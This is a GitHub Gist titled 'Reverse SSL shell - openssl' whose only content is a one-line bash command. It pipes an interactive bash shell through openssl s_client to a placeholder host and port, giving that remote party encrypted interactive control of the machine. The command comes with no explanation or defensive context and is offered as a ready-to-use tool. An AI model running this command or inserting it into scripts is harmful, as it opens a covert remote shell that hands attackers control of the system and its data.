Created
February 12, 2018 00:10
-
-
Save omartrigui/975a879362999fc8c6ce659f7b8c22b3 to your computer and use it in GitHub Desktop.
Reverse SSL shell - openssl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <HOST>:<PORT> > /tmp/s; rm /tmp/s |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment